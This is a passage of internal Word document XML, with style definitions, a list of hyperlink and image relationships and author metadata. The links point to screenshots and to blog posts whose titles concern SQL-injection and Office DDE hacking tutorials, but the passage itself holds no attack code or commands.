    <w:basedOn w:val="Fuentedeprrafopredeter"/>
    <w:uiPriority w:val="20"/>
    <w:qFormat/>
    <w:rsid w:val="00F528B5"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-attribute">
    <w:name w:val="hljs-attribute"/>
    <w:basedOn w:val="Fuentedeprrafopredeter"/>
    <w:rsid w:val="00F528B5"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-keyword">
    <w:name w:val="hljs-keyword"/>
    <w:basedOn w:val="Fuentedeprrafopredeter"/>
    <w:rsid w:val="00F528B5"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-comment">
    <w:name w:val="hljs-comment"/>
    <w:basedOn w:val="Fuentedeprrafopredeter"/>
    <w:rsid w:val="00F528B5"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-name">
    <w:name w:val="hljs-name"/>
    <w:basedOn w:val="Fuentedeprrafopredeter"/>
    <w:rsid w:val="00F528B5"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="fn">
    <w:name w:val="fn"/>
    <w:basedOn w:val="Fuentedeprrafopredeter"/>
    <w:rsid w:val="003E3B3E"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="metadate">
    <w:name w:val="meta_date"/>
    <w:basedOn w:val="Fuentedeprrafopredeter"/>
    <w:rsid w:val="003E3B3E"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="published">
    <w:name w:val="published"/>
    <w:basedOn w:val="Fuentedeprrafopredeter"/>
    <w:rsid w:val="003E3B3E"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="metacomments">
    <w:name w:val="meta_comments"/>
    <w:basedOn w:val="Fuentedeprrafopredeter"/>
    <w:rsid w:val="003E3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2524">
              <w:blockQuote w:val="1"/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2.bp.blogspot.com/-0fsATmBdrbc/V7AE4FMidcI/AAAAAAAAACI/L9C513OwOr8DvKPlR0tIbfRyNa1smGiUgCLcB/s1600/web-hackingtools-2015-32-638.jpg" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.paginavulnerable.com/index.php?ID=2" TargetMode="External"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://3.bp.blogspot.com/-xbi-5IdBUyw/V7ALlqxCqCI/AAAAAAAAAC8/Gl9jUZ9VA94zqZFjoR_In6uGJvHT71LOgCLcB/s1600/Sin%2Bt%25C3%25ADtulo.jpg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3.bp.blogspot.com/-BxbIbc_H76w/V7AIlTsSdnI/AAAAAAAAACs/uy0V5RDX_tkdEeMk-4KEfFMrxVncu5vMgCLcB/s1600/xd.png" TargetMode="External"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://3.bp.blogspot.com/-Te05ynWqpCQ/V7AOyTA7ftI/AAAAAAAAADg/1DQgr3VkGeQU5cbztV5UZlkIuB0xhfutgCLcB/s1600/Sin%2Bt%25C3%25ADtulo.png" TargetMode="External"/><Relationship Id="rId42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://3.bp.blogspot.com/-CWS9mEwslJg/V7ARlmn9mQI/AAAAAAAAAEM/jKNfgANlwSkmOx8ELxEJnxivAwF9ErvmwCLcB/s1600/Sin%2Bt%25C3%25ADtulo.png" TargetMode="External"/><Relationship Id="rId47" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image17.jpeg"/><Relationship Id="rId50" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/fontTable" Target="fontTable.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://1bytegris.blogspot.com/2016/08/hackeando-bases-de-datos-con-sql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image" Target="media/image8.png"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://1.bp.blogspot.com/-3088FLmRRPM/V7AD7cw6gEI/AAAAAAAAAB8/EhhUHR2cNycS6S8q7qy13JlHLeqKwkZ5gCLcB/s1600/5rgfg46rg.png" TargetMode="External"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://3.bp.blogspot.com/-4NajiWeZDrY/V7ALPvtax7I/AAAAAAAAAC4/Edt_HGVbcwYcn4PS_hYy1Hij6yAP_rKLQCLcB/s1600/Sin%2Bt%25C3%25ADtulo.jpg" TargetMode="External"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://3.bp.blogspot.com/-XZW4gVE4PV4/V7AN9-z7nyI/AAAAAAAAADU/ff3DDHJpaQEXOF3sPfZxWxdr2hoFN0kmgCLcB/s1600/Sin%2Bt%25C3%25ADtulo.png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3.bp.blogspot.com/-PmQGzKMb3Ms/V7AQzZ000WI/AAAAAAAAAD8/pcx7HQikSvcxsI0053EVsyLXET_SXaoPwCLcB/s1600/Sin%2Bt%25C3%25ADtulo.png" TargetMode="External"/><Relationship Id="rId45" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image16.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://securityhacklabs.net/search/node?keys=metasploit" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://1.bp.blogspot.com/-5FKHcZ2IwYo/V7AF-oh1DYI/AAAAAAAAACU/Rf_bSZ-2pCoboHJMwuFCZFHd1N5zpO8kgCLcB/s1600/xd.png" TargetMode="External"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.paginavulnerable.com/index.php?ID=2" TargetMode="External"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://3.bp.blogspot.com/-yCXRhu11Flc/V7ANQNhHJcI/AAAAAAAAADM/Itf4S1L_278oPq2dWUlby-UAdFEIIcviQCLcB/s1600/Sin%2Bt%25C3%25ADtulo.png" TargetMode="External"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://2.bp.blogspot.com/-n98030PVlrA/V7APOkOZ6lI/AAAAAAAAADo/13NygXr5vVkeOrct-Fyk9-pvTo5NWLy5wCLcB/s1600/Sin%2Bt%25C3%25ADtulo.png" TargetMode="External"/><Relationship Id="rId49" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image18.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://1bytegris.blogspot.com/2016/08/hackeando-bases-de-datos-con-sql.html" TargetMode="External"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://4.bp.blogspot.com/-19hgTL1kunw/V7AHcWmKLmI/AAAAAAAAACg/ZXMBgDb24zo0jaOfm6Uy2MzXrfCkvr1FACLcB/s1600/Sin%2Bt%25C3%25ADtulo.jpg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1.bp.blogspot.com/-8z-rK01ZHRM/V7ASEPf1xZI/AAAAAAAAAEQ/OvGuU6TSbcsgAXsgpjCnVOP0V-Rd25N5wCLcB/s1600/Sin%2Bt%25C3%25ADtulo.png" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://192.168.0.1/" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://1bytegris.blogspot.com/2016/08/hackeando-bases-de-datos-con-sql.html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5.png"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image7.jpeg"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://4.bp.blogspot.com/-AZvt5MHHJR4/V7ANgA6q_aI/AAAAAAAAADQ/ytd0AlvafE8VqdfoxzNxIp-9AxWPLOXywCLcB/s1600/Sin%2Bt%25C3%25ADtulo.p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hyperlink" Target="https://1.bp.blogspot.com/-c9Y9zG_U4vU/V7ATL9uWP2I/AAAAAAAAAEk/mgY7n4_UgtcFYvIZimUFudYoZJ-n0qx8gCLcB/s1600/Sin%2Bt%25C3%25ADtulo.jpg" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.blogger.com/profile/06280211814289700544" TargetMode="Externa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www.paginavulnerable.com/index.php?ID=2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0.png"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://2.bp.blogspot.com/-IwP7tReHT4o/V7AQTGXycqI/AAAAAAAAAD4/du96rtabKIsxnZcSh6zzSBejZGCNP35RACLcB/s1600/Sin%2Bt%25C3%25ADtulo.png" TargetMode="External"/><Relationship Id="rId46" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://2.bp.blogspot.com/-P4SbhdnHumU/V7ASofA1JnI/AAAAAAAAAEc/szM0yX5f-Y0ScLveh-WJCJIRcnQSBc9DwCLcB/s1600/Sin%2Bt%25C3%25ADtulo.jpg" TargetMode="External"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image4.jpeg"/><Relationship Id="rId41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securityhacklabs.net/infectando-office-windows-ddeaut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13</Pages>
  <Words>1555</Words>
  <Characters>8866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Migdalia Noguera</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Migdalia Noguera</cp:lastModifiedBy>
  <cp:revision>1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-04-13T20:26:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-04-14T05:31:00Z</dcterms:modified>
</cp:coreProperties>
</file>